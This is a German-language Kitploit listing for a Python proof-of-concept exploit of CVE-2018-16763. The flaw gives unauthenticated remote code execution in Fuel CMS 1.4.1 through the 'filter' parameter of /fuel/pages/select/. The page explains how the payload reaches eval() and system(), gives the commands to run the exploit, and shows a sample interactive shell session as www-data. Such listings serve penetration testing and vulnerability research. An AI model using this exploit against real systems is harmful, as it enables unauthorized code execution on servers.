Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/estebanzarate/cve-2018-16763-fuel-cms-1.4.1-remote-code-execution-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubestebanzarate/cve-2018-16763-fuel-cms-1.4.1-remote-code-execution-poc

CVE-2018-16763-Fuel-CMS-1.4.1-Remote-Code-Execution-PoC

Python-PoC für nicht authentifizierte Remote-Codeausführung in Fuel CMS 1.4.1 über den Parameter `filter`, der eine interaktive Shell zur Befehlsausführung bereitstellt.

Repository anzeigen
1vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2018-16763 — Fuel CMS 1.4.1 Remote Code Execution (PoC)

Nicht authentifizierte RCE-Sicherheitslücke in Fuel CMS 1.4.1. Der Parameter filter im Endpunkt /fuel/pages/select/ wird ohne Bereinigung an einen eval()-Aufruf im PHP-Backend übergeben, wodurch beliebiger Code über einen manipulierten Payload ausgeführt werden kann. Im Gegensatz zu Blind-Injections wird die Ausgabe direkt in der HTTP-Antwort reflektiert, sodass keine Zwischendatei benötigt wird.


Funktionsweise

  1. Sendet eine GET-Anfrage an /fuel/pages/select/ mit einem speziell präparierten filter-Payload, der die PHP-Funktion system() mit dem gewünschten Befehl aufruft.
  2. Analysiert die reflektierte Ausgabe aus der HTTP-Antwort mithilfe eines Regex-Musters.
  3. Gibt die Befehlsausgabe direkt an die interaktive Shell zurück.

Voraussetzungen

  • Python 3
  • Abhängigkeiten installieren:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit

Verwendung

root@kitploit:~
python3 exploit.py -t http://TARGET

Beispiel:

root@kitploit:~
$ python3 exploit.py -t http://10.10.10.10
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data
Shell> hostname
fuel-cms
Shell> exit

Referenzen

  • CVE-2018-16763
  • EDB-47138

Danksagungen

  • Entdeckung und ursprünglicher Exploit: Syed Sheeraz Ali
  • Bereinigung und interaktive Shell: Esteban Zárate
Tool herunterladen